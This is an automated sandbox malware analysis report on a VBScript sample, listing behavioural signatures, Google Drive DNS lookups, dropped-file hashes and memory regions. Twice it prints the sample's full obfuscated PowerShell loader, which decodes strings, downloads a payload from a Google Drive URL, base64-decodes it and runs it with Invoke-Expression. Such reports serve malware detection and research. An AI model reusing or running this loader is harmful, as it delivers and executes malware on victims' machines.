Malware Analysis Report

2025-01-18 02:19

Sample ID 240613-bqkxdsyflb
Target 24dac6b183fc5cb29533742b3e54f209.bin
SHA256 688671fcf92adabafc63e4833b50f9730bab3a3295848589c2720f0e34462225
Tags execution
Score 6/10

Analysis Overview

Score 6/10

SHA256

688671fcf92adabafc63e4833b50f9730bab3a3295848589c2720f0e34462225

Threat Level: Shows suspicious behavior

The file 24dac6b183fc5cb29533742b3e54f209.bin was found to show suspicious behavior.

Malicious Activity Summary

execution

Legitimate hosting services abused for malware hosting/C2

Command and Scripting Interpreter: PowerShell

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-13 01:20

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-13 01:20

Reported

2024-06-13 01:23

Platform

win7-20240508-en

Max time kernel

144s

Max time network

149s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\259e6985a69d303cbd0945bb663c8ad54c28ef2cce53c2271b6e4912476d6f7b.vbs"

Signatures

Legitimate hosting services abused for malware hosting/C2

Description  Indicator         Process  Target
N/A          drive.google.com  N/A      N/A
N/A          drive.google.com  N/A      N/A
N/A          drive.google.com  N/A      N/A
N/A          drive.google.com  N/A      N/A
N/A          drive.google.com  N/A      N/A
N/A          drive.google.com  N/A      N/A
N/A          drive.google.com  N/A      N/A
N/A          drive.google.com  N/A      N/A
N/A          drive.google.com  N/A      N/A

Command and Scripting Interpreter: PowerShell

execution
Description  Indicator  Process                                                    Target
N/A          N/A        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  N/A

Suspicious behavior: EnumeratesProcesses

Description  Indicator  Process                                                    Target
N/A          N/A        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  N/A

Suspicious use of AdjustPrivilegeToken

Description              Indicator  Process                                                    Target
Token: SeDebugPrivilege  N/A        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\259e6985a69d303cbd0945bb663c8ad54c28ef2cce53c2271b6e4912476d6f7b.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -windowstyle 1 "$Personliste = 1;$Binomialkoefficientens='';Function Superbusily($Livvidde){$Chrysothrix=$Livvidde.Length-$Personliste;$Servility=$Binomialkoefficientens+'Substring';For( $Ignoreringen=7;$Ignoreringen -lt $Chrysothrix;$Ignoreringen+=8){$bytrafik+=$Livvidde.$Servility.Invoke( $Ignoreringen, $Personliste);}$bytrafik;}function Outhue($Gaspedalens){ . ($Spasmolytically) ($Gaspedalens);}$Prvetekstens=Superbusily 'TinkturMphilosoo,nalterzS.ainleiSsp.jdelEneherslAstroloaEliks,r/Ru,idum5Undivid.Multinu0 ilians Cons.ab(PrveudsWtown,eaiRadbuganByggefod Mi,troo Fysik,w unnomas kek.te M,ulanaNOffent,TSpender Untramp1firedel0 dibenz.,igtana0 arrowi; Udbry. Und.rfoW Unb.waiGr,vsmenSeksual6 proede4 ,ynebe; Taktfa Registx For,rg6 adduce4Vekselr;st,dent Ruge.sprLocus.ivUn moke:Re,nves1 tautol2 Insinu1Eng evi.Kulmine0de.embr)Postpat Impo tuGCarcinoeorgi,stcComputekOphedenohovedsk/ Gaader2infleks0Renssan1Kvgsmis0Erhverv0Opslags1Jeremys0emballe1V.ginis Res.skFSvikml iGste.rer udbredeU combifGe.dannokitsdogx Efterh/Superco1 S oleb2Ynkelig1Volplan.Boldspi0 Deepin ';$Salgsvarerne=Superbusily ' F glefUf,ldauts Aboli.edesertarFreder.-RekursiAsalam.ng GordiaeRhombohnBa,ehtttO.nifor ';$nucleole=Superbusily 'AfstreghStorebrtNutc,ketVerdenspniddin.sQuac le:Mariali/Samarit/ Signa,dJasminerOpskresiA etyltvFolkedreNe gang.Le,ekasgStj,mpeoUnshunnoRentekogf,lserulIndh,ntePr mrpr.Defacinclevo,ucoudkradsm.taalig/S.rmoneu Unascec Uncomp?Tikmpere MotacixVenizelp HovedboRekomperklis.ertEuphono=HomophodSplenetoHelgenswbaadeh.nAbbrevilP.essero Be.utyaUroleucdDrmmesl&Quai eriTeknokrdHakkapi=Oxidise1 ,nciderSammenkrDagbrknbMor,enazTralledlbipinnaq SalthoYUnderbiRMo.ndinL NathasCKoeksissexten.alinaktivPSpha,roKA.lurenLGennems1rendejeyChrys.pp CouthsoUnderdr1bnskrafFFod,oldEmis urn1StraaliuHypnotiOSprachlkLoes,es3VoltospKPr.depeJKnhjdenaDalagamW LagdefKRu.dten ';$Beaandingens=Superbusily 'Lighter>gre.twh ';$Spasmolytically=Superbusily 'scorneri Ufo.tveBogtrykxBanesaa 
';$Munkerup='Bankerotten';$Idrttens = Superbusily '.ihiliseGhu mulcNaadesthBadekaao muskie Par.elr%,ladtrya Refr.spSnortlepPenneprdgen.nskaJorganst SociolaPa,anuc%Ar.ogra\Te.charFCre enyi Temperd LindyseSluknt,is alinokFjerneno Ousterm F.rbrumDeceleri Overr.sLimstensBlgetopa WhilterDramatiiRoughfos Reoff k Palladehailstos Electr.MainfraSA judanlOrohydra,arobes Katikc &acrorha&Lipect, ImodstoeAmarantcLithotrhNonviraoRubb.ri StasiditMonokro ';Outhue (Superbusily 'Var etp$Staggerg Nasturl CarpinoParadokb Enst.vaClor,gelIn.esba:OdiscotsPa,tisorTrimorpgwant.nseutvetydf Kom.etlS praseoTaagetarFlyndereKursusmn avan.eeDemagogs bol,je= Adaman(Led,ggacFlamme m Shar idSvr,eds Skilten/B,nkbesc Highto nononer$ WondroI DusrjgdLandganrTantalitEksporttS.bningeInd lagnFaineansGilrava)Partner ');Outhue (Superbusily ' Coadju$GoaledogNnnen.elPanosteo.lejencbSumm tiaLig stilTrickli:sammentSKon raklApterinaSk,devapaf egnesBelomant Hektari ParthecUsigelikAnonolj=Plurip.$layloclnPachucouImplemecAstrobilOpslidse EjerlaoLrerf rlPrincewePapirp . 
Ubesvasauto trp NaboinlSuperheiKohrenttMejerie(Div,rce$InclipsBSynl gheChefkriahaevespaStopfodnInvaliddRabbitiiDe,entrnRewiresgUvealtoeU.recogntilplanslate,op)Tobacco ');$nucleole=$Slapstick[0];$Overgild= (Superbusily ' ymphom$GestaltgGenforelAkkumuloPrfer.nbUncorreaF,rhaanlAflyse :Vin ergSOutseekuGloppyhb PoliticSandhe,uCervinatSvedkiriJunkb,as ArmbeveHaspninsKnappyg=KopskatNbeskytteFjernstwFolkere-serg,lrO Hum.nmb hattiojdiskoteeRumnskecNonvolutaarsb.r KoreishS OlaviayHejsevrsMedusiftIltendeeSt.esermMapmaki.UnputriNHemmelieHistioltant.rea.ChauffeW TyranteSoc.alab re,derCoverderlRet.pleiAl,amiaeflippinnSkuflert');$Overgild+=$srgeflorenes[1];Outhue ($Overgild);Outhue (Superbusily 'Hrerrsf$PresynaSTerrazzuDok.tnibhagridicUforeneu.oncinntTeatersiNedsablsM asbygeTeltligsForespr.Decim lHBestormeFortrstaS,uirtidKasseapeKulturprG,ldfiss Antisp[Wo msee$ Medi,bSBredsdoaKvartsulHjemsengPreinjusPaxamprv Forv.la SissonrLyknskneArrearirHaeldten OutimaeBlurred]Forsvar=Or cula$EksisteP G benerToluid v NematoeVitrioltsvr.gteeNotoneck bab.lisCaricattOsogambedzoti.hn .ambods Horror ');$astringeringernes=Superbusily 'Idyllic$StatsfnSDemonteuCifbittb Overs,cBrasseyu FireletPyrr.lbiTerpolysEfteraaeModeordsH.vedba. 
VenkesDSeniorso Topob wrigor.snTjekkerl.eisminoTestkrsaBeothukd.oldjesF FyringiReflexelAmtsraae Gase.u( fldern$UricuronForegriuCapaletcSmdend.lBo,tedeeDolesfao Terapel Enh.nceNonrequ,Voldtgt$Pr.arbidS,egepaa Vagtstmlsk.dednNasalitaStradintPr genioGundesprDefrosty Tawesu)Kalk,la ';$damnatory=$srgeflorenes[0];Outhue (Superbusily 'marimba$W nterigTulisa lPlutonioSlavehabDelineaaNonargulLeptoce: araffiG LevedyyFilibuslMilieupdBre,vekiSkriblegAp.theohInquilieAsminesdopdukke2B.ossep3Galning3Slagt.s=Typwkul( Grupp,TstemplieArbejdesWirosc,tTreade.-applikaPMassersaSp.serntTeltdughMimeogr Udbrede$Transf,dSkrabnsaDemokramD.ovedhn UdvandaLayeragtAntisemoTowpathrisocyanyStruggl)Exsus i ');while (!$Gyldighed233) {Outhue (Superbusily 'Tvangsa$NewcolcgSkr.atolOpslidnoPhilolobFunnimeaEspaceml,altern:ClearinPKnastakeBrandforPatent,vFrikenda.oyarsslCotterhvInsula.aStrenger Manicu=cuppens$F,rurentUnemendrZurliteuJonos,re Freder ') ;Outhue $astringeringernes;Outhue (Superbusily 'AnfordrSparsleytReedieraSyvmiler nddatattimetal-.remsesS HypoamlPustersedroskebeAfmeldepKo,omip Bvelses4Solos.n ');Outhue (Superbusily ' ysiote$UdenriggBrnevenlBond.paoExtensubSevartwaPup idslOscillo:IntercoG De finyIridizalCoitaled Pr,ktiiMvhp,angUdsprinh MeseegeOk oberdVandlaa2Svanges3Reg.nte3Es roge=.anetti( forwarTvinc,nzeSu,chlosliersbatHar,eni-HovedpuP Ve,denaTotitivtHemiopihNetoper Madrepo$Koesem,d Ka.egoa Indsaam PituitnBrothiea DoomhotLo rdesoHulketmrTyssendyHortiku) Croose ') ;Outhue (Superbusily 'Singale$Cokyshig ormulal NaturmoambiencbVantguaaCalligrlF,annel:SpillepAJagtprouFaglitttErgometoGenansklSkade.ryUdfyldtcA,pehoru Venstrs dignit=Nylonsp$DecostagEliminelSti.lepo Tipoldbenle.fdaReallnslDecrimi:UntheisAVaccinenUd yndegCheeseme Reg.nelUdtydnifGangartiRejehopsTeatersh,irknineSkibs,asMaski,s+Ejefald+Spiseb.%Opposit$Feci.lbS aturallForew,eaKlbestrp Hoveris misfo.thawkmotiDybhavscUderumskFiskeku.Unlethac SeksteoRec,rbouBrunel nDesa,metPhotpho ') 
;$nucleole=$Slapstick[$Autolycus];}$Rjsernes=333842;$Definitionernes=30113;Outhue (Superbusily 'Rutilan$SpecialgFrustrelU dvrlioPepitatbPigletcaFel.adhlMendels: C,ffinC S.lonkiParamutl ProduklA.leygaemul,angrChl.ropyKlippe. S rafpo=Iliocos IndtgtGClawsnoeForfaretHvn,err- UautorCUnd.rshoOpbevarn no,exptGlucon.eParlam,nindirectPetr li cryptoc$.pegepldDemagogaBlivesmmAntiantn flerspa EksametStrainao Udlig rdrspiony Succum ');Outhue (Superbusily 'Haavard$Spad efgTristezl aproctoDeco.orbMelonryaDelmomelAbl.cta:V,ndprvAkluk atn F,ttoge FlaffesMiracu tManubrihFederaleUrinaletUnphiloiKha,arfzNaivisme Oarf,s Martyn= udhol Th,irse[Dahlia SLength,y IsvintsVerden.t UnrumoeDinornimModef.l.VendetaCJoyprooo Honni.nB rgninvDisco.ye AfskrarDugpunktPhototr]Unmolde: rader,: SommerF Benz.nrS.dpudeoSlgtsfem AncienBEffulgea KedushsForbilleMetam.r6Epigene4BunchbaSAandendtcausewarVac.inaiEyeshadnSpl chngDefinie(Soigner$M gdepaCIno erci allotl Biklanl SyphoneOberstirSubstriySummon.) Tilbag ');Outhue (Superbusily ' Re,ros$Sw.thergOstracolFedes.ioB,slagsb AzandeaBelevnel Artles:Friskh TWash dlu ExtracmGuesserpSkytteklConstitiAmpelidndabblineHimen,f Trilleb=Sektion Hellang[ efloccSEudaimoyUn.andssPangaratTi,trnge HarengmSeismog.straf,eTPolydemeTristicx.efloattGennems.Fo teraEAdsprednObscurac FletteoTantal.dKreditgiChromatnEksterngKartere]Unaggra:Unsatir:MoseegmAP,rmafrSPokerisCArchimpIAbalienITvivlsw.PegepinGSnustobeMave,netBesotscSK,ressetPlat yfr SexoloiFormumnn F,libugFormaak(Angstfu$.oneybeAAgricsynGudet,mePljtelesBeflendt Disperh VandroeTransvetEfter,ri SmaglszMarisaseBr eraa)Kdetrkb ');Outhue (Superbusily 'Cotehel$ Vaun.hgArchie l Retsopo KontrobFreshenaSubs.anlWale ty:Re,ubliFDr coceoDv.geflrFoveolee OveropsDe.oaguk PropenrSyge.ikiHulrumbvEn cture MistralEnfiressOrdkriteEnma dsrGangbessafs.ori=Forsyth$rectifiTKrigsk,uOve.sttmDelingspLimberel Antirei Brach,nExecra eEngrosp.JordspesShrimpiuKodekseb MyrernsNon,portSpr tkrrPer,onaiPreco,snPlebeiag Monato(Liftgat$e 
oismsRTremblyjBefrielsToneflge PteridrForla snSvigerseMas incsArren t,Or,anis$Finhak DRundskaeSu arytfGob esoi DisdennFiktio,iUmennestP eceabiUdbandtoMi osfin EdeltreSvibl,nrKrselsfnDrt,inseContinusEpicond)Ind,cie ');Outhue $Foreskrivelsers;"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Fideikommissariskes.Sla && echo t"

Network

Country  Destination  Domain            Proto
US       8.8.8.8:53   drive.google.com  udp
US       8.8.8.8:53   drive.google.com  udp
US       8.8.8.8:53   drive.google.com  udp
US       8.8.8.8:53   drive.google.com  udp
US       8.8.8.8:53   drive.google.com  udp
US       8.8.8.8:53   drive.google.com  udp
US       8.8.8.8:53   drive.google.com  udp
US       8.8.8.8:53   drive.google.com  udp
US       8.8.8.8:53   drive.google.com  udp

Files

C:\Users\Admin\AppData\Local\Temp\Ggehvidens.txt

MD5 1bdacc28017d2adeab8c40b68e30acfd
SHA1 94ac78a16d912649ddb9421ddf3017aed9556660
SHA256 5c0997916dcf6961681d53886efa088f514aa237301c311ab3cabaab526b2744
SHA512 409d19810ea569da7fdbf73d916958e39ac2853124b289217e3c9d7ebac9ce225ff954663938a381244d4f82b890ac0094f060ba8ac2e2882856f45f13d864ef

memory/1976-328-0x000007FEF585E000-0x000007FEF585F000-memory.dmp

memory/1976-329-0x000000001B530000-0x000000001B812000-memory.dmp

memory/1976-330-0x0000000002310000-0x0000000002318000-memory.dmp

memory/1976-331-0x000007FEF55A0000-0x000007FEF5F3D000-memory.dmp

memory/1976-332-0x000007FEF55A0000-0x000007FEF5F3D000-memory.dmp

memory/1976-333-0x000007FEF55A0000-0x000007FEF5F3D000-memory.dmp

memory/1976-334-0x000007FEF585E000-0x000007FEF585F000-memory.dmp

memory/1976-335-0x000007FEF55A0000-0x000007FEF5F3D000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-13 01:20

Reported

2024-06-13 01:23

Platform

win10v2004-20240508-en

Max time kernel

150s

Max time network

151s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\259e6985a69d303cbd0945bb663c8ad54c28ef2cce53c2271b6e4912476d6f7b.vbs"

Signatures

Legitimate hosting services abused for malware hosting/C2

Description  Indicator         Process  Target
N/A          drive.google.com  N/A      N/A
N/A          drive.google.com  N/A      N/A
N/A          drive.google.com  N/A      N/A
N/A          drive.google.com  N/A      N/A
N/A          drive.google.com  N/A      N/A
N/A          drive.google.com  N/A      N/A
N/A          drive.google.com  N/A      N/A
N/A          drive.google.com  N/A      N/A

Command and Scripting Interpreter: PowerShell

execution
Description  Indicator  Process                                                    Target
N/A          N/A        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  N/A

Suspicious behavior: EnumeratesProcesses

Description  Indicator  Process                                                    Target
N/A          N/A        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  N/A
N/A          N/A        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  N/A

Suspicious use of AdjustPrivilegeToken

Description              Indicator  Process                                                    Target
Token: SeDebugPrivilege  N/A        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\259e6985a69d303cbd0945bb663c8ad54c28ef2cce53c2271b6e4912476d6f7b.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -windowstyle 1 "$Personliste = 1;$Binomialkoefficientens='';Function Superbusily($Livvidde){$Chrysothrix=$Livvidde.Length-$Personliste;$Servility=$Binomialkoefficientens+'Substring';For( $Ignoreringen=7;$Ignoreringen -lt $Chrysothrix;$Ignoreringen+=8){$bytrafik+=$Livvidde.$Servility.Invoke( $Ignoreringen, $Personliste);}$bytrafik;}function Outhue($Gaspedalens){ . ($Spasmolytically) ($Gaspedalens);}$Prvetekstens=Superbusily 'TinkturMphilosoo,nalterzS.ainleiSsp.jdelEneherslAstroloaEliks,r/Ru,idum5Undivid.Multinu0 ilians Cons.ab(PrveudsWtown,eaiRadbuganByggefod Mi,troo Fysik,w unnomas kek.te M,ulanaNOffent,TSpender Untramp1firedel0 dibenz.,igtana0 arrowi; Udbry. Und.rfoW Unb.waiGr,vsmenSeksual6 proede4 ,ynebe; Taktfa Registx For,rg6 adduce4Vekselr;st,dent Ruge.sprLocus.ivUn moke:Re,nves1 tautol2 Insinu1Eng evi.Kulmine0de.embr)Postpat Impo tuGCarcinoeorgi,stcComputekOphedenohovedsk/ Gaader2infleks0Renssan1Kvgsmis0Erhverv0Opslags1Jeremys0emballe1V.ginis Res.skFSvikml iGste.rer udbredeU combifGe.dannokitsdogx Efterh/Superco1 S oleb2Ynkelig1Volplan.Boldspi0 Deepin ';$Salgsvarerne=Superbusily ' F glefUf,ldauts Aboli.edesertarFreder.-RekursiAsalam.ng GordiaeRhombohnBa,ehtttO.nifor ';$nucleole=Superbusily 'AfstreghStorebrtNutc,ketVerdenspniddin.sQuac le:Mariali/Samarit/ Signa,dJasminerOpskresiA etyltvFolkedreNe gang.Le,ekasgStj,mpeoUnshunnoRentekogf,lserulIndh,ntePr mrpr.Defacinclevo,ucoudkradsm.taalig/S.rmoneu Unascec Uncomp?Tikmpere MotacixVenizelp HovedboRekomperklis.ertEuphono=HomophodSplenetoHelgenswbaadeh.nAbbrevilP.essero Be.utyaUroleucdDrmmesl&Quai eriTeknokrdHakkapi=Oxidise1 ,nciderSammenkrDagbrknbMor,enazTralledlbipinnaq SalthoYUnderbiRMo.ndinL NathasCKoeksissexten.alinaktivPSpha,roKA.lurenLGennems1rendejeyChrys.pp CouthsoUnderdr1bnskrafFFod,oldEmis urn1StraaliuHypnotiOSprachlkLoes,es3VoltospKPr.depeJKnhjdenaDalagamW LagdefKRu.dten ';$Beaandingens=Superbusily 'Lighter>gre.twh ';$Spasmolytically=Superbusily 'scorneri Ufo.tveBogtrykxBanesaa 
';$Munkerup='Bankerotten';$Idrttens = Superbusily '.ihiliseGhu mulcNaadesthBadekaao muskie Par.elr%,ladtrya Refr.spSnortlepPenneprdgen.nskaJorganst SociolaPa,anuc%Ar.ogra\Te.charFCre enyi Temperd LindyseSluknt,is alinokFjerneno Ousterm F.rbrumDeceleri Overr.sLimstensBlgetopa WhilterDramatiiRoughfos Reoff k Palladehailstos Electr.MainfraSA judanlOrohydra,arobes Katikc &acrorha&Lipect, ImodstoeAmarantcLithotrhNonviraoRubb.ri StasiditMonokro ';Outhue (Superbusily 'Var etp$Staggerg Nasturl CarpinoParadokb Enst.vaClor,gelIn.esba:OdiscotsPa,tisorTrimorpgwant.nseutvetydf Kom.etlS praseoTaagetarFlyndereKursusmn avan.eeDemagogs bol,je= Adaman(Led,ggacFlamme m Shar idSvr,eds Skilten/B,nkbesc Highto nononer$ WondroI DusrjgdLandganrTantalitEksporttS.bningeInd lagnFaineansGilrava)Partner ');Outhue (Superbusily ' Coadju$GoaledogNnnen.elPanosteo.lejencbSumm tiaLig stilTrickli:sammentSKon raklApterinaSk,devapaf egnesBelomant Hektari ParthecUsigelikAnonolj=Plurip.$layloclnPachucouImplemecAstrobilOpslidse EjerlaoLrerf rlPrincewePapirp . 
Ubesvasauto trp NaboinlSuperheiKohrenttMejerie(Div,rce$InclipsBSynl gheChefkriahaevespaStopfodnInvaliddRabbitiiDe,entrnRewiresgUvealtoeU.recogntilplanslate,op)Tobacco ');$nucleole=$Slapstick[0];$Overgild= (Superbusily ' ymphom$GestaltgGenforelAkkumuloPrfer.nbUncorreaF,rhaanlAflyse :Vin ergSOutseekuGloppyhb PoliticSandhe,uCervinatSvedkiriJunkb,as ArmbeveHaspninsKnappyg=KopskatNbeskytteFjernstwFolkere-serg,lrO Hum.nmb hattiojdiskoteeRumnskecNonvolutaarsb.r KoreishS OlaviayHejsevrsMedusiftIltendeeSt.esermMapmaki.UnputriNHemmelieHistioltant.rea.ChauffeW TyranteSoc.alab re,derCoverderlRet.pleiAl,amiaeflippinnSkuflert');$Overgild+=$srgeflorenes[1];Outhue ($Overgild);Outhue (Superbusily 'Hrerrsf$PresynaSTerrazzuDok.tnibhagridicUforeneu.oncinntTeatersiNedsablsM asbygeTeltligsForespr.Decim lHBestormeFortrstaS,uirtidKasseapeKulturprG,ldfiss Antisp[Wo msee$ Medi,bSBredsdoaKvartsulHjemsengPreinjusPaxamprv Forv.la SissonrLyknskneArrearirHaeldten OutimaeBlurred]Forsvar=Or cula$EksisteP G benerToluid v NematoeVitrioltsvr.gteeNotoneck bab.lisCaricattOsogambedzoti.hn .ambods Horror ');$astringeringernes=Superbusily 'Idyllic$StatsfnSDemonteuCifbittb Overs,cBrasseyu FireletPyrr.lbiTerpolysEfteraaeModeordsH.vedba. 
VenkesDSeniorso Topob wrigor.snTjekkerl.eisminoTestkrsaBeothukd.oldjesF FyringiReflexelAmtsraae Gase.u( fldern$UricuronForegriuCapaletcSmdend.lBo,tedeeDolesfao Terapel Enh.nceNonrequ,Voldtgt$Pr.arbidS,egepaa Vagtstmlsk.dednNasalitaStradintPr genioGundesprDefrosty Tawesu)Kalk,la ';$damnatory=$srgeflorenes[0];Outhue (Superbusily 'marimba$W nterigTulisa lPlutonioSlavehabDelineaaNonargulLeptoce: araffiG LevedyyFilibuslMilieupdBre,vekiSkriblegAp.theohInquilieAsminesdopdukke2B.ossep3Galning3Slagt.s=Typwkul( Grupp,TstemplieArbejdesWirosc,tTreade.-applikaPMassersaSp.serntTeltdughMimeogr Udbrede$Transf,dSkrabnsaDemokramD.ovedhn UdvandaLayeragtAntisemoTowpathrisocyanyStruggl)Exsus i ');while (!$Gyldighed233) {Outhue (Superbusily 'Tvangsa$NewcolcgSkr.atolOpslidnoPhilolobFunnimeaEspaceml,altern:ClearinPKnastakeBrandforPatent,vFrikenda.oyarsslCotterhvInsula.aStrenger Manicu=cuppens$F,rurentUnemendrZurliteuJonos,re Freder ') ;Outhue $astringeringernes;Outhue (Superbusily 'AnfordrSparsleytReedieraSyvmiler nddatattimetal-.remsesS HypoamlPustersedroskebeAfmeldepKo,omip Bvelses4Solos.n ');Outhue (Superbusily ' ysiote$UdenriggBrnevenlBond.paoExtensubSevartwaPup idslOscillo:IntercoG De finyIridizalCoitaled Pr,ktiiMvhp,angUdsprinh MeseegeOk oberdVandlaa2Svanges3Reg.nte3Es roge=.anetti( forwarTvinc,nzeSu,chlosliersbatHar,eni-HovedpuP Ve,denaTotitivtHemiopihNetoper Madrepo$Koesem,d Ka.egoa Indsaam PituitnBrothiea DoomhotLo rdesoHulketmrTyssendyHortiku) Croose ') ;Outhue (Superbusily 'Singale$Cokyshig ormulal NaturmoambiencbVantguaaCalligrlF,annel:SpillepAJagtprouFaglitttErgometoGenansklSkade.ryUdfyldtcA,pehoru Venstrs dignit=Nylonsp$DecostagEliminelSti.lepo Tipoldbenle.fdaReallnslDecrimi:UntheisAVaccinenUd yndegCheeseme Reg.nelUdtydnifGangartiRejehopsTeatersh,irknineSkibs,asMaski,s+Ejefald+Spiseb.%Opposit$Feci.lbS aturallForew,eaKlbestrp Hoveris misfo.thawkmotiDybhavscUderumskFiskeku.Unlethac SeksteoRec,rbouBrunel nDesa,metPhotpho ') 
;$nucleole=$Slapstick[$Autolycus];}$Rjsernes=333842;$Definitionernes=30113;Outhue (Superbusily 'Rutilan$SpecialgFrustrelU dvrlioPepitatbPigletcaFel.adhlMendels: C,ffinC S.lonkiParamutl ProduklA.leygaemul,angrChl.ropyKlippe. S rafpo=Iliocos IndtgtGClawsnoeForfaretHvn,err- UautorCUnd.rshoOpbevarn no,exptGlucon.eParlam,nindirectPetr li cryptoc$.pegepldDemagogaBlivesmmAntiantn flerspa EksametStrainao Udlig rdrspiony Succum ');Outhue (Superbusily 'Haavard$Spad efgTristezl aproctoDeco.orbMelonryaDelmomelAbl.cta:V,ndprvAkluk atn F,ttoge FlaffesMiracu tManubrihFederaleUrinaletUnphiloiKha,arfzNaivisme Oarf,s Martyn= udhol Th,irse[Dahlia SLength,y IsvintsVerden.t UnrumoeDinornimModef.l.VendetaCJoyprooo Honni.nB rgninvDisco.ye AfskrarDugpunktPhototr]Unmolde: rader,: SommerF Benz.nrS.dpudeoSlgtsfem AncienBEffulgea KedushsForbilleMetam.r6Epigene4BunchbaSAandendtcausewarVac.inaiEyeshadnSpl chngDefinie(Soigner$M gdepaCIno erci allotl Biklanl SyphoneOberstirSubstriySummon.) Tilbag ');Outhue (Superbusily ' Re,ros$Sw.thergOstracolFedes.ioB,slagsb AzandeaBelevnel Artles:Friskh TWash dlu ExtracmGuesserpSkytteklConstitiAmpelidndabblineHimen,f Trilleb=Sektion Hellang[ efloccSEudaimoyUn.andssPangaratTi,trnge HarengmSeismog.straf,eTPolydemeTristicx.efloattGennems.Fo teraEAdsprednObscurac FletteoTantal.dKreditgiChromatnEksterngKartere]Unaggra:Unsatir:MoseegmAP,rmafrSPokerisCArchimpIAbalienITvivlsw.PegepinGSnustobeMave,netBesotscSK,ressetPlat yfr SexoloiFormumnn F,libugFormaak(Angstfu$.oneybeAAgricsynGudet,mePljtelesBeflendt Disperh VandroeTransvetEfter,ri SmaglszMarisaseBr eraa)Kdetrkb ');Outhue (Superbusily 'Cotehel$ Vaun.hgArchie l Retsopo KontrobFreshenaSubs.anlWale ty:Re,ubliFDr coceoDv.geflrFoveolee OveropsDe.oaguk PropenrSyge.ikiHulrumbvEn cture MistralEnfiressOrdkriteEnma dsrGangbessafs.ori=Forsyth$rectifiTKrigsk,uOve.sttmDelingspLimberel Antirei Brach,nExecra eEngrosp.JordspesShrimpiuKodekseb MyrernsNon,portSpr tkrrPer,onaiPreco,snPlebeiag Monato(Liftgat$e 
oismsRTremblyjBefrielsToneflge PteridrForla snSvigerseMas incsArren t,Or,anis$Finhak DRundskaeSu arytfGob esoi DisdennFiktio,iUmennestP eceabiUdbandtoMi osfin EdeltreSvibl,nrKrselsfnDrt,inseContinusEpicond)Ind,cie ');Outhue $Foreskrivelsers;"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Fideikommissariskes.Sla && echo t"

Network

Country  Destination  Domain                Proto
US       8.8.8.8:53   8.8.8.8.in-addr.arpa  udp
US       8.8.8.8:53   drive.google.com      udp
US       8.8.8.8:53   drive.google.com      udp
US       8.8.8.8:53   drive.google.com      udp
US       8.8.8.8:53   drive.google.com      udp
US       8.8.8.8:53   drive.google.com      udp
US       8.8.8.8:53   drive.google.com      udp
US       8.8.8.8:53   drive.google.com      udp
US       8.8.8.8:53   drive.google.com      udp

Files

C:\Users\Admin\AppData\Local\Temp\Ggehvidens.txt

MD5 714cb325c3d69ffdf652293ead3d50b1
SHA1 f79daa74b0ff2c765007c8b0e22a3bedb05ba5a6
SHA256 641832d41890d7f88f0ebbbd45d1168bfdb199408820ee139e1f2c8d0b62587d
SHA512 816a67a4407ec8850ed9fa0dde87f5c5dd6959e68b378865a338f6253d1e0a9ff51dc63c85497491dafd29b53b96702e08c937017eb2ba6d3ea7bfffbe6da07a

C:\Users\Admin\AppData\Local\Temp\Ggehvidens.txt

MD5 5791b2b2b17aa013def1da16dcbc8ab3
SHA1 841fcae50ddd7f66b105744deae2d3424762ba1b
SHA256 3f153f741aa814f65701c4f2ad0d97a53049e30148a9a48437434fb6a971b38b
SHA512 82391bb1c6ea2b006982bce3da12e564afa965cc603e1ecac5b42ca02b44f768ded0f12979c4a6b5b926e333e53402b20cf7040f3042ead16e84d25714aca1fa

C:\Users\Admin\AppData\Local\Temp\Ggehvidens.txt

MD5 1bdacc28017d2adeab8c40b68e30acfd
SHA1 94ac78a16d912649ddb9421ddf3017aed9556660
SHA256 5c0997916dcf6961681d53886efa088f514aa237301c311ab3cabaab526b2744
SHA512 409d19810ea569da7fdbf73d916958e39ac2853124b289217e3c9d7ebac9ce225ff954663938a381244d4f82b890ac0094f060ba8ac2e2882856f45f13d864ef

memory/4296-317-0x00007FFB51493000-0x00007FFB51495000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lyfjnhny.ldt.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4296-327-0x000002087C9A0000-0x000002087C9C2000-memory.dmp

memory/4296-328-0x00007FFB51490000-0x00007FFB51F51000-memory.dmp

memory/4296-329-0x00007FFB51490000-0x00007FFB51F51000-memory.dmp

memory/4296-330-0x00007FFB51490000-0x00007FFB51F51000-memory.dmp

memory/4296-331-0x00007FFB51490000-0x00007FFB51F51000-memory.dmp

memory/4296-332-0x00007FFB51493000-0x00007FFB51495000-memory.dmp

memory/4296-333-0x00007FFB51490000-0x00007FFB51F51000-memory.dmp

memory/4296-334-0x00007FFB51490000-0x00007FFB51F51000-memory.dmp